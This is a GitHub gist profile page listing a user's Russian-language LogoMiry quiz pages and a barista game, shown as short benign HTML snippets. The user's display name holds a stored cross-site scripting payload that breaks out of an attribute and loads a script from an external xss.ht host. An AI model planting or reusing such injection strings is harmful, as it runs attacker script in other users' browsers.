Skip to content

Instantly share code, notes, and snippets.

View cyberopus's full-sized avatar

cyberopus"><script src=https://cyberopus.xss.ht></script> cyberopus

View GitHub Profile
@cyberopus
cyberopus / logomiry_test_v3.html
Last active May 21, 2026 20:07
ЛогоМиры — интерактивный тест v5
<!DOCTYPE html>
<html lang="ru">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Тест по ЛогоМирам</title>
<style>
*{box-sizing:border-box;margin:0;padding:0}
body{font-family:'Segoe UI',Arial,sans-serif;background:#1a1a2e;color:#e0e0e0;min-height:100vh}
.wrap{max-width:760px;margin:0 auto;padding:20px}
@cyberopus
cyberopus / logomiry_test_v2.html
Created May 21, 2026 19:18
Тест по ЛогоМирам — по материалам учебника
<!DOCTYPE html>
<html lang="ru">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Тест по ЛогоМирам</title>
<style>
*{box-sizing:border-box;margin:0;padding:0}
body{font-family:'Segoe UI',Arial,sans-serif;background:#1a1a2e;color:#e0e0e0;min-height:100vh}
.wrap{max-width:760px;margin:0 auto;padding:20px}
@cyberopus
cyberopus / logomiry_test.html
Created May 21, 2026 18:55
Тест по Логомирам — 50 вопросов, 10 случайных
<!DOCTYPE html>
<html lang="ru">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Тест по Логомирам</title>
<style>
* { box-sizing: border-box; margin: 0; padding: 0; }
body { font-family: 'Segoe UI', Arial, sans-serif; background: #1a1a2e; color: #e0e0e0; min-height: 100vh; }
@cyberopus
cyberopus / barista.html
Created April 27, 2026 14:19
Barista coffee game
<!DOCTYPE html>
<html lang="ru">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<title>Бариста ☕</title>
<style>
*{box-sizing:border-box;margin:0;padding:0}
body{background:#1a0a00;color:#fff;font-family:sans-serif;min-height:100vh;display:flex;flex-direction:column;align-items:center}
#game{width:100%;max-width:420px;padding:10px;display:flex;flex-direction:column;gap:10px}